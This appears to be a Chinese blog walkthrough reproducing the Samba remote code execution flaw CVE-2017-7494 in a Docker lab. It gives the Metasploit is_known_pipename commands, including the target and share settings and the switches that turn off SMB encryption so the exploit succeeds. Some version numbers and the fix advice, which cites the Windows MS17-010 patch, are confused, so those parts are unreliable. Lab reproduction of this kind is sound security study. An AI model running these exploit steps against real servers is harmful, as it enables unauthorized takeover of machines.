linux Samba远程代码执行漏洞(CVE-2017-7494)复现


一、漏洞介绍

  Samba实现Windows主机与Linux服务器之间的资源共享,Linux操作系统提供了Samba服务,Samba服务为两种不同的操作系统架起了一座桥梁,使Linux系统和Windows系统之间能够实现互相通信。samba在linux系统上实现SMB协议的服务,使用SMB协议在局域网上共享文件和打印机.CVE-2017-7494,2017年5月24日Samba发布了4.6.4版本,修复严重的远程代码执行漏洞,该漏洞影响了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本,可以让恶意访问者远程控制受影响的Linux和Unix机器。

二、主要影响版本

1、MS17-010方程式“永恒之蓝”

WannaCry勒索蠕虫,影响Windows xp 到Windows server 2012

2、CVE-2017-7494 Linux版本“永恒之蓝”远程代码执行漏洞

Samba 3.5.0-4.6.4/4.5.1/4.4.14中间的所有版本

三、漏洞利用条件

1、部署了存在漏洞的samba版本,并且对外网开放445端口;

2、匿名访问用户对共享文件有可写权限;(权限控制很重要)

3、需要知道共享目录的物理路径。

四、漏洞危害及常见攻击方式

1、获取服务器或个人pc的权限;

2、攻击者常使用渗透测试工具metersploit中的exp进行攻击。

五、漏洞复现

1、复现环境:

安装了docker的Ubuntu服务器:192.168.4.128

攻击机(kali):192.168.4.157

2.步骤:

开启docker环境

sudo  docker-compose up -d

 

 sudo docker ps     //查看漏洞环境开启情况

 

 msfconsole

use use exploit/linux/samba/is_known_pipename

show options

 

 set rhost 192.168.4.128

set SMB_FOLDER   /home/share

show options

 

这里出现了加密错误,需要通过不加密来进行exploit

 

 set SMB::AlwaysEncrypt false     //设置SMB总是不加密
set SMB::ProtocolVersion 1         //设置协议版本为Version 1

 

 exploit

六、漏洞修复建议

1、安装ms17-010不定或升级samba版本到4.6.4

2、对外网关闭445端口

 


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM